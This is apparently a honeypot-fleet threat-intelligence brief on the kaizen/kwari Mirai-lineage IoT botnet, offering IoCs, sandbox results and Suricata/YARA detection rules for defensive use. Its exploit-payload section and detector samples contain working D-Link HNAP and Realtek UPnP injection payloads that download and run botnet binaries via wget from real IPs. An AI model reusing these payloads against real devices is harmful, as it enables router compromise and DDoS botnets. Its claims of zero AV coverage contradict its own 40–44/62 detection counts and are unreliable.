TLP:CLEAR ⚡ ACTIVE — Last seen 2026-06-23 Mirai lineage

KAIZEN / KWARI — IoT Botnet Campaign

Dual-named Mirai-lineage botnet exploiting D-Link HNAP and Realtek UPnP RCE. Novel — not yet in public threat intel feeds.

255 capture events
30d active window
20 / 36 sensors hit
40–44 / 62 VT detections (key samples)
10 / 10 triage score
2 CVE vectors
Executive Summary

Between 2026-05-25 and 2026-06-23, the cowrAI honeypot fleet observed a coordinated IoT exploitation campaign distributing Mirai-lineage binaries under two distinct naming conventions: kaizen.* and kwari.*. The campaign targets embedded devices via two pre-authentication remote code execution vulnerabilities: a D-Link DSL-2750B syslog command injection (140 events, 19 scanner IPs) and the well-known Realtek miniigd UPnP SOAP injection (CVE-2014-8361, 51 events, 12 scanner IPs).

Sandbox detonation of kwari.x86 and kwari.mips confirmed live C2 connectivity to 185.234.100.154:2310, the same IP serving binary downloads, with both samples running for the full 300-second observation window and generating 13–14 MB of C2 beacon traffic.

Infrastructure is actively expanding: a fourth distribution node (196.251.121.142) was observed today (2026-06-23) serving the latest kaizen.arm7 build. The dual naming and separate distribution paths suggest either two operators sharing C2 infrastructure or a single operator using naming to track separate exploitation campaigns. The defense_evasion triage tag — unusual for run-of-the-mill Mirai forks — warrants attention.

Threat Actor Profile

Campaign name:          KAIZEN / KWARI (operator self-reference via binary names)
Malware family:         Mirai-lineage IoT botnet
Classification:         DDoS botnet; possible proxy/spam capability (full triage pending)
Sophistication:         Low–medium. Known public CVEs; novel binary (no AV coverage). C2 co-located with distribution server.
Target devices:         D-Link DSL-2750B routers; Realtek SDK-based CPE (routers, NAS, IP cameras)
Architecture coverage:  ARM (4 variants), MIPS BE, MIPS LE, x86, SPARC, Renesas SH4
Entry vector:           Unauthenticated pre-auth RCE (no credentials required)
C2 protocol:            TCP/2310 to 185.234.100.154 (Mirai-standard C2 port range)
First observed:         2026-05-25
Last observed:          2026-06-23 (today; new distribution node added)
Reporting basis:        TLP:CLEAR — publish freely

Infrastructure
SCANNERS                           DISTRIBUTION NODES
────────────────────               ────────────────────────────────────────
176.65.139.22  (D-Link HNAP)  ──▶  83.142.209.46    /a3f8d2/kaizen.*    (first seen 2026-06-15)
177.22.44.30   (Realtek UPnP) ──▶  176.65.149.168   /bins/kaizen.arm7   (first seen 2026-06-06)
51.158.101.255 (Realtek UPnP) ──▶  185.234.100.154  /Binary/kwari.*     (first seen 2026-06-10)
                               ──▶  196.251.121.142  /a3f8d2/kaizen.arm7 (NEW — 2026-06-23)
                                        │
CVE PAYLOADS                            │ binary fetch (HTTP)
─────────────                           ▼
D-Link HNAP inject                 Target device
  /HNAP1/ POST                          │
  remote_host=;cd /tmp;wget...          │ executes binary
  chmod 777; ./kaizen.arm7              │ selfrep arg: "realtek"
                                        │
Realtek UPnP SOAP inject               ▼
  NewInternalClient backtick       C2 SERVER: 185.234.100.154:2310  ◀── SAME HOST AS kwari.* distrib
  `cd /tmp; wget ...; ./...`           Mirai TCP C2 (300s+ sessions observed)
                                        13–14 MB beacon pcap per session

Notable: the kwari binary distribution server (185.234.100.154) doubles as the confirmed C2 endpoint (:2310). This single-host pattern is operationally simple but fragile — one takedown removes both distribution and C2.

Malware Analysis

13 unique binaries collected. Key samples (kwari.x86, kwari.mips, kaizen.arm7) submitted to VirusTotal on 2026-06-23 and returned 40–44/62 detections — AV engines recognize this as a Mirai variant. The campaign value lies in the infrastructure intelligence (4 distribution nodes, confirmed C2, D-Link HNAP vector) rather than AV evasion.

Filename     Architecture           Size       VT     Triage  Tags                        SHA256 (prefix)
───────────  ─────────────────────  ─────────  ─────  ──────  ──────────────────────────  ───────────────
kaizen.arm7  ELF 32-bit LSB ARM     140,584 B  40/63  10      defense_evasion, discovery  b3f594...
kaizen.arm7  ELF 32-bit LSB ARM     140,584 B  27/62  10      n/a                         e8aef7...
kaizen.arm7  ELF 32-bit LSB ARM     140,584 B  0/62   n/a     n/a                         24f414...
kaizen.mips  ELF 32-bit MSB MIPS    311,032 B  n/a    n/a     n/a                         15495d...
kwari.x86    ELF 32-bit LSB x86     53,852 B   44/62  10      botnet:kaizen               370883...
kwari.mips   ELF 32-bit MSB MIPS    75,836 B   43/62  10      botnet:kaizen               bf6be1...
kwari.spc    ELF 32-bit MSB SPARC   61,076 B   0/62   10      botnet:kaizen               ae3011...
kwari.sh4    ELF 32-bit LSB Renesas SH  51,968 B  0/62  10    mirai                       aa1cab...
kwari.arm    ELF 32-bit LSB ARM     58,432 B   0/62   10      botnet:kaizen               e2fd09...
kwari.arm7   ELF 32-bit LSB ARM     131,489 B  0/62   10      botnet:kaizen               a57093...
kwari.arm6   ELF 32-bit LSB ARM     70,788 B   0/62   10      botnet:kaizen               bc390b...
kwari.arm5   ELF 32-bit LSB ARM     51,392 B   0/62   10      botnet:kaizen               fb6e1f...
kwari.mpsl   ELF 32-bit LSB MIPS    76,476 B   0/62   10      botnet:kaizen               166046...
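The Architecture column above is derived from the ELF header alone (EI_CLASS, EI_DATA and e_machine), which is how a collection pipeline can bucket multi-arch drops like kaizen.*/kwari.* before any sandbox exists for them. The following is an added example, not code from the brief or from the cowrAI fleet: it labels a blob the way the table does, adds the size and SHA256 prefix columns, and runs over constructed minimal ELF headers that stand in for the real samples (the e_machine constants are the ELF specification's; the sample bytes are made up here).

```python
import hashlib
import struct
from typing import Dict, List, Optional

# e_machine values from the ELF specification for the architectures in the sample table
E_MACHINE = {
    0x02: "SPARC",
    0x03: "x86",
    0x08: "MIPS",
    0x28: "ARM",
    0x2A: "Renesas SH",
}


def classify_elf(data: bytes) -> Optional[str]:
    """Label an ELF blob the way the table does ('ELF 32-bit LSB ARM'); None if not ELF."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    ei_class, ei_data = data[4], data[5]
    bits = {1: "32-bit", 2: "64-bit"}.get(ei_class)
    endian = {1: "LSB", 2: "MSB"}.get(ei_data)
    if bits is None or endian is None:
        return None
    # e_machine lives at offset 18 and is stored in the file's own byte order,
    # so a MIPS BE sample must be read big-endian or the value comes out wrong.
    (e_machine,) = struct.unpack_from("<H" if ei_data == 1 else ">H", data, 18)
    arch = E_MACHINE.get(e_machine, "unknown(0x%02x)" % e_machine)
    return "ELF %s %s %s" % (bits, endian, arch)


def triage_row(name: str, data: bytes) -> Dict[str, object]:
    """One row of the malware table: filename, architecture label, size and SHA256 prefix."""
    return {
        "filename": name,
        "architecture": classify_elf(data),
        "size": len(data),
        "sha256_prefix": hashlib.sha256(data).hexdigest()[:6],
    }


def make_header(ei_class: int, ei_data: int, e_machine: int, pad: int = 40) -> bytes:
    """Constructed minimal ELF header for testing; a stand-in, not one of the campaign's binaries."""
    order = "<" if ei_data == 1 else ">"
    e_ident = b"\x7fELF" + bytes([ei_class, ei_data, 1, 0]) + b"\x00" * 8  # 16 bytes
    # e_type = 2 (ET_EXEC), e_machine, e_version = 1; the rest of the header is zero-filled
    return e_ident + struct.pack(order + "HHI", 2, e_machine, 1) + b"\x00" * pad


# Constructed samples named after the table's filenames (not the real files)
SAMPLES = {
    "kaizen.arm7": make_header(1, 1, 0x28),
    "kaizen.mips": make_header(1, 2, 0x08),
    "kwari.x86":   make_header(1, 1, 0x03),
    "kwari.spc":   make_header(1, 2, 0x02),
    "kwari.sh4":   make_header(1, 1, 0x2A),
    "kwari.mpsl":  make_header(1, 1, 0x08),
    "README":      b"not an ELF file",
}


def triage_table(samples: Dict[str, bytes]) -> List[Dict[str, object]]:
    return [triage_row(name, blob) for name, blob in samples.items()]


if __name__ == "__main__":
    for row in triage_table(SAMPLES):
        print(row)
```

Note that the header is read in the file's own byte order: a big-endian MIPS or SPARC drop with e_machine read as little-endian would be mislabelled as an unknown machine, which is exactly the kind of mistake that hides an architecture from the sample table.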

Sandbox Detonation Results

Two samples (kwari.x86, kwari.mips) were detonated successfully in an isolated WARP-egress sandbox. Both ran for the full 300-second observation window and contacted the C2 immediately.

Sample                  Exit              Runtime  PCAP          C2 Endpoint
──────────────────────  ────────────────  ───────  ────────────  ────────────────────
kwari.x86  (370883...)  killed (timeout)  300s     13,687,104 B  185.234.100.154:2310
kwari.mips (bf6be1...)  killed (timeout)  300s     14,454,780 B  185.234.100.154:2310

ARM samples did not detonate (x86-only sandbox). The 13–14 MB of C2 traffic per 300-second session is characteristic of Mirai keep-alive beaconing carrying DDoS target lists.

Defense Evasion Tag — Unusual for Mirai Forks

tria.ge flags kaizen.arm7 with defense_evasion alongside standard discovery and botnet:kaizen tags. Vanilla Mirai forks typically only trigger execution and c2 tags. Defense evasion suggests possible anti-analysis code (VM detection, sleep-before-connect, or signal-based anti-debugging) not present in the canonical Mirai codebase. Further static analysis warranted.

Captured Exploit Payloads

Vector 1 — D-Link DSL-2750B HNAP Syslog Command Injection

Scanner: 176.65.139.22. Targets the HNAP remote syslog configuration endpoint. The remote_host parameter accepts shell metacharacters without sanitization. URL-encoded semicolons (%3b) terminate the expected value and inject arbitrary commands. No authentication required.

POST /HNAP1/ HTTP/1.1
SOAPAction: "http://purenetworks.com/HNAP1/SetSyslogSettings"
Content-Type: text/xml

remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&
LogFlag=0&remote_host=%3bcd+/tmp;wget+http://83.142.209.46/a3f8d2/kaizen.arm7;
chmod+777+kaizen.arm7;./kaizen.arm7;rm+-rf+kaizen.arm7%3b%2

Decoded injection: ; cd /tmp; wget http://83.142.209.46/a3f8d2/kaizen.arm7; chmod 777 kaizen.arm7; ./kaizen.arm7; rm -rf kaizen.arm7

Vector 2 — Realtek miniigd UPnP SOAP Injection (CVE-2014-8361)

Scanners: 177.22.44.30, 176.65.139.22. Targets Realtek SDK UPnP daemon (port 52869 or 37215). The NewInternalClient SOAP field is passed to a shell without sanitization. Backtick injection executes arbitrary commands as root. Binary launched with arg realtek for Mirai-style self-replication tracking.

POST /picsdesc.xml HTTP/1.1
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"

<NewInternalClient>`cd /tmp; rm -rf kaizen.mips; wget http://83.142.209.46/a3f8d2/kaizen.mips;
chmod 777 kaizen.mips; ./kaizen.mips realtek`</NewInternalClient>

The realtek arg in ./kaizen.mips realtek follows Mirai convention: argv[1] identifies the infection vector for operator reporting.
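Both captured vectors above share one defensive property: the injected field (remote_host in the HNAP form, NewInternalClient in the SOAP body) is supposed to hold a bare host address, so any shell metacharacter or non-address value in it is an indicator on its own, and the decoded command carries the download URL and the Mirai-style argv[1] tag worth extracting as IoCs. The following is an added example written for this brief, not code from the cowrAI fleet or the honeypot software: it takes a captured request as text, decodes the field the way the honeypot would, flags the injection, and pulls out URLs, dropped filenames and the infection-vector argument. The sample requests are constructed here from the payloads quoted above; the benign samples are made up.

```python
import ipaddress
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# Shell metacharacters that have no business in a syslog host or a UPnP client address
SHELL_META = re.compile(r"[;`|&]|\$\(")
URL_RE = re.compile(r"https?://[^\s;`'\"<>]+")
NIC_RE = re.compile(r"<NewInternalClient>(.*?)</NewInternalClient>", re.S)
# "./binary [arg]": the optional argument is the Mirai-style infection-vector tag (argv[1])
EXEC_RE = re.compile(r"\./([\w.]+)(?:[ \t]+(\w+))?")


def split_request(raw: str) -> Tuple[str, str]:
    head, _, body = raw.partition("\n\n")
    return head, body


def parse_form(body: str) -> Dict[str, str]:
    """Split a form body on '&' only. urllib.parse.parse_qs is avoided on purpose:
    older Pythons also split on ';', which would hide the very separators we look for."""
    fields: Dict[str, str] = {}
    for pair in body.replace("\n", "").split("&"):
        if pair:
            key, _, value = pair.partition("=")
            fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def _finding(vector: str, field: str, value: str) -> dict:
    return {
        "vector": vector,
        "field": field,
        "command": value,
        "urls": URL_RE.findall(value),
        "exec": [(m.group(1), m.group(2)) for m in EXEC_RE.finditer(value)],
    }


def inspect_request(raw: str) -> List[dict]:
    """Return one finding per injected field found in a captured HTTP request."""
    head, body = split_request(raw)
    request_line = head.splitlines()[0] if head else ""
    findings: List[dict] = []
    if "/HNAP1/" in request_line:
        host = parse_form(body).get("remote_host", "")
        if SHELL_META.search(host):
            findings.append(_finding("dlink-hnap-syslog-injection", "remote_host", host))
    for client in NIC_RE.findall(body):
        client = client.strip()
        try:
            ipaddress.ip_address(client)  # a legitimate value is a bare IP address
        except ValueError:
            findings.append(_finding("realtek-upnp-soap-injection (CVE-2014-8361)",
                                     "NewInternalClient", client))
    return findings


# Constructed from the captured payloads quoted in the brief (line breaks of the capture joined)
HNAP_SAMPLE = (
    "POST /HNAP1/ HTTP/1.1\n"
    'SOAPAction: "http://purenetworks.com/HNAP1/SetSyslogSettings"\n'
    "Content-Type: text/xml\n"
    "\n"
    "remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&"
    "LogFlag=0&remote_host=%3bcd+/tmp;wget+http://83.142.209.46/a3f8d2/kaizen.arm7;"
    "chmod+777+kaizen.arm7;./kaizen.arm7;rm+-rf+kaizen.arm7%3b%2"
)
REALTEK_SAMPLE = (
    "POST /picsdesc.xml HTTP/1.1\n"
    'SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"\n'
    "\n"
    "<NewInternalClient>`cd /tmp; rm -rf kaizen.mips; wget http://83.142.209.46/a3f8d2/kaizen.mips;\n"
    "chmod 777 kaizen.mips; ./kaizen.mips realtek`</NewInternalClient>"
)
# Constructed benign requests: plain addresses in both fields
BENIGN_HNAP = "POST /HNAP1/ HTTP/1.1\nContent-Type: text/xml\n\nLogFlag=0&remote_host=192.0.2.10"
BENIGN_UPNP = "POST /picsdesc.xml HTTP/1.1\n\n<NewInternalClient>192.168.1.20</NewInternalClient>"

if __name__ == "__main__":
    for sample in (HNAP_SAMPLE, REALTEK_SAMPLE, BENIGN_HNAP, BENIGN_UPNP):
        print(inspect_request(sample))
```

The decode step matters for signature writers too: the HNAP capture arrives with the leading separator encoded as %3b while later semicolons are literal, so a rule that only looks for one spelling will miss a variant that flips the encoding.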

Campaign Timeline

MITRE ATT&CK Mapping

T1190      Exploit Public-Facing Application
           D-Link HNAP syslog injection + Realtek CVE-2014-8361 UPnP SOAP injection. Both unauthenticated pre-auth RCE.

T1059.004  Command and Scripting: Unix Shell
           Backtick injection into Realtek SOAP field; semicolon-chained commands in HNAP payload.

T1105      Ingress Tool Transfer
           wget fetches binary to /tmp after initial shell access. Architecture-specific binary selection.

T1027      Obfuscated Files or Information
           tria.ge defense_evasion tag on kaizen.arm7. Possible anti-analysis techniques absent from base Mirai.

T1016      System Network Configuration Discovery
           tria.ge discovery tag; Mirai-standard network interface enumeration for DDoS source selection.

T1498      Network Denial of Service
           Primary botnet function. C2 at :2310 issues DDoS commands; 13–14 MB continuous beacon traffic per sandbox session.

T1070.004  Indicator Removal: File Deletion
           Payload ends with rm -rf kaizen.arm7 after execution — removes binary from disk.

T1584      Compromise Infrastructure
           Four distribution nodes observed; C2 co-located with kwari distribution server. Possible compromised VPS infrastructure.

Indicators of Compromise

Network — Scanner IPs

IP              Role             CVE Vector
──────────────  ───────────────  ────────────────────────────────────────────────────
176.65.139.22   Primary scanner  D-Link HNAP syslog injection + Realtek CVE-2014-8361
177.22.44.30    Realtek scanner  CVE-2014-8361 UPnP SOAP
51.158.101.255  Realtek scanner  CVE-2014-8361 UPnP SOAP

Network — Distribution & C2 IPs

IP               Role                               Path / Port                 First Seen
───────────────  ─────────────────────────────────  ──────────────────────────  ──────────
83.142.209.46    kaizen.* distribution              /a3f8d2/kaizen.*            2026-06-15
176.65.149.168   kaizen.* distribution (secondary)  /bins/kaizen.arm7           2026-06-06
185.234.100.154  kwari.* distribution + C2          /Binary/kwari.* · TCP:2310  2026-06-10
196.251.121.142  kaizen.* distribution (NEW)        /a3f8d2/kaizen.arm7         2026-06-23

Network — URLs

URL                                         Binary
──────────────────────────────────────────  ───────────────────────────
http://83.142.209.46/a3f8d2/kaizen.arm7     ARM7 botnet ELF
http://83.142.209.46/a3f8d2/kaizen.mips     MIPS BE botnet ELF
http://176.65.149.168/bins/kaizen.arm7      ARM7 botnet ELF (secondary)
http://185.234.100.154/Binary/kwari.*       Multi-arch kwari binaries
http://196.251.121.142/a3f8d2/kaizen.arm7   ARM7 botnet ELF (newest)

Files — SHA256 Hashes

SHA256                                                            Filename     VT
────────────────────────────────────────────────────────────────  ───────────  ─────
b3f59415949a6a17ba9e2859fe727bec1d375227e685c92ecd61bb8e73e531a7  kaizen.arm7  40/63
15495d978314cbc03ed3014e9987f134bfc56d811d8ad819039d3a5792f829b6  kaizen.mips  n/a
e8aef7c572007e2c5aa3954f590822ed1c077698100b9924af825dab1cf91902  kaizen.arm7  27/62
24f4143e26c9d07571084a1a6abbcf4828f8325457c8461531e43b3e04829c48  kaizen.arm7  0
370883f9f6e88309dffc8b89bdbcfa3dae339bf2d7e41986eac5505a0ae14cbd  kwari.x86    44/62
bf6be1b8b100bc3ca6763f0d7e412108ed3fd60f05f2e5aec2042be3f1cda66d  kwari.mips   43/62
ae3011372b07bb2860589c959324f7ad48d7db350a10104c40e871a17be924bd  kwari.spc    0
aa1cab94fc4be8078649d0a8cc23e48e7d8394190be844df243afa819fb2936f  kwari.sh4    0
e2fd0927ebfb811830610c4cc26bd08066fa94427ed8c3838fc7a5d70724588b  kwari.arm    0
a570938e00ba22ed95e64cf214b3215f86056411bf7c3452bbc5431591e35b07  kwari.arm7   0
bc390bbf8ab84102c08cfec67a32393b20644b2ed35b293ba752e24f4a2ccdd6  kwari.arm6   0
fb6e1f32318f2b5504f0a2d6a942fc570c1145b944b261fd184c3d3b98f9ce42  kwari.arm5   0
166046807bb1f4e33c77eff2bc0eead70f1935dcdac9b07845b8aa482e3b2500  kwari.mpsl   0

File Artifacts

Artifact                  Location  Notes
────────────────────────  ────────  ─────────────────────────────────────────────────────────────
kaizen.{arm7,mips,...}    /tmp/     Written then deleted after exec (rm -rf in payload)
kwari.{x86,mips,arm,...}  /tmp/     Distributed from separate IP; no self-deletion observed in payload

Detection Signatures

SURICATA — D-Link HNAP Payload Pattern

alert http $EXTERNAL_NET any -> $HOME_NET any (
  msg:"cowrAI KAIZEN D-Link HNAP Syslog Command Injection";
  flow:to_server,established;
  http.method; content:"POST";
  http.uri; content:"/HNAP1/";
  http.request_body; content:"remote_submit_Flag=1"; content:"remote_host=%3b";
  classtype:attempted-admin;
  reference:url,cowrai-intel-reports.pages.dev/kaizen-botnet/;
  sid:9100001; rev:1;
)

SURICATA — Realtek UPnP SOAP Injection (CVE-2014-8361)

alert http $EXTERNAL_NET any -> $HOME_NET 52869 (
  msg:"cowrAI KAIZEN Realtek UPnP SOAP Command Injection CVE-2014-8361";
  flow:to_server,established;
  http.method; content:"POST";
  http.request_body; content:"NewInternalClient"; content:"kaizen"; nocase;
  classtype:attempted-admin;
  reference:cve,2014-8361;
  reference:url,cowrai-intel-reports.pages.dev/kaizen-botnet/;
  sid:9100002; rev:1;
)

SURICATA — Binary Download Detection (kaizen.* / kwari.*)

alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"cowrAI KAIZEN/KWARI Binary Download";
  flow:to_server,established;
  http.uri; content:"/kaizen."; nocase;
  reference:url,cowrai-intel-reports.pages.dev/kaizen-botnet/;
  sid:9100003; rev:1;
)

alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"cowrAI KWARI Binary Download";
  flow:to_server,established;
  http.uri; content:"/kwari."; nocase;
  reference:url,cowrai-intel-reports.pages.dev/kaizen-botnet/;
  sid:9100004; rev:1;
)

SURICATA — C2 Beacon (185.234.100.154:2310)

alert tcp $HOME_NET any -> 185.234.100.154 2310 (
  msg:"cowrAI KAIZEN/KWARI C2 Beacon to Confirmed C2 Endpoint";
  flow:to_server,established;
  classtype:trojan-activity;
  reference:url,cowrai-intel-reports.pages.dev/kaizen-botnet/;
  sid:9100005; rev:1;
)

YARA — Binary Family Heuristic

rule KAIZEN_KWARI_IoT_Botnet {
    meta:
        author      = "cowrAI Honeypot Fleet"
        description = "KAIZEN/KWARI Mirai-lineage IoT botnet (zero VT as of 2026-06-23)"
        date        = "2026-06-23"
        tlp         = "CLEAR"

    strings:
        $name1 = "kaizen" ascii nocase
        $name2 = "kwari"  ascii nocase
        $mirai1 = "/proc/net/tcp" ascii
        $mirai2 = "PRIVMSG" ascii
        $path1  = "/a3f8d2/" ascii
        $path2  = "/Binary/" ascii

    condition:
        // every declared string must be referenced, otherwise yara refuses to compile the rule;
        // the distribution-path strings are therefore included as a third, weaker signal
        uint32(0) == 0x464c457f and
        (any of ($name*) or any of ($path*) or all of ($mirai*)) and
        filesize < 400KB
}

Attribution Notes

Distinct from FROSTY Campaign

The FROSTY campaign (also tracked by this fleet) shares the Realtek CVE-2014-8361 vector but is otherwise distinct: FROSTY additionally exploits CVE-2017-17215 (Huawei HG532), uses entirely different distribution infrastructure, carries 41/62 VT detections (vs 0 here), and routes C2 through a separate IP space. Binary naming conventions (frosty.* vs kaizen.*/kwari.*), distribution paths, and C2 endpoints are all different. These are unrelated operators.

Attribute           KAIZEN/KWARI                           FROSTY
──────────────────  ─────────────────────────────────────  ─────────────────────────────────────────────
CVE vectors         D-Link HNAP + Realtek CVE-2014-8361    Realtek CVE-2014-8361 + Huawei CVE-2017-17215
VT detections       40–44 / 62 (key samples, 2026-06-23)   41 / 62
C2 endpoint         185.234.100.154:2310                   Separate IP space
D-Link HNAP vector  Yes (140 events, primary vector)       No

Dual Naming Hypothesis

The kaizen.* and kwari.* naming across separate distribution IPs suggests either: (a) two operators sharing the same C2 infrastructure at 185.234.100.154:2310, each naming their build separately, or (b) a single operator using naming to differentiate exploitation campaigns (kaizen = CVE-targeted, kwari = SSH brute-force). The co-located C2 endpoint favors (b). The Japanese word "kaizen" (改善, continuous improvement) as a botnet name is an unusual choice.

Collection Methodology

Data collected passively by the cowrAI distributed honeypot fleet — 36 cowrie 2.9.17 nodes across multiple providers in Europe, North America, and Asia-Pacific. Nodes run SSH/Telnet lures plus 9 alt-protocol lure daemons, including soaplure (ports 7547, 37215, 52869), which captured both CVE payloads.

Binaries are automatically retrieved by a chase-runner sidecar (5-minute polling interval), SHA256-hashed, stored in R2, and submitted to VirusTotal and tria.ge. Confirmed samples are detonated in an isolated sandbox using WARP-egress with network capture.

This brief was generated from live sensor data collected between 2026-05-25 and 2026-06-23. All IOCs are derived from direct honeypot captures — no third-party threat feed enrichment.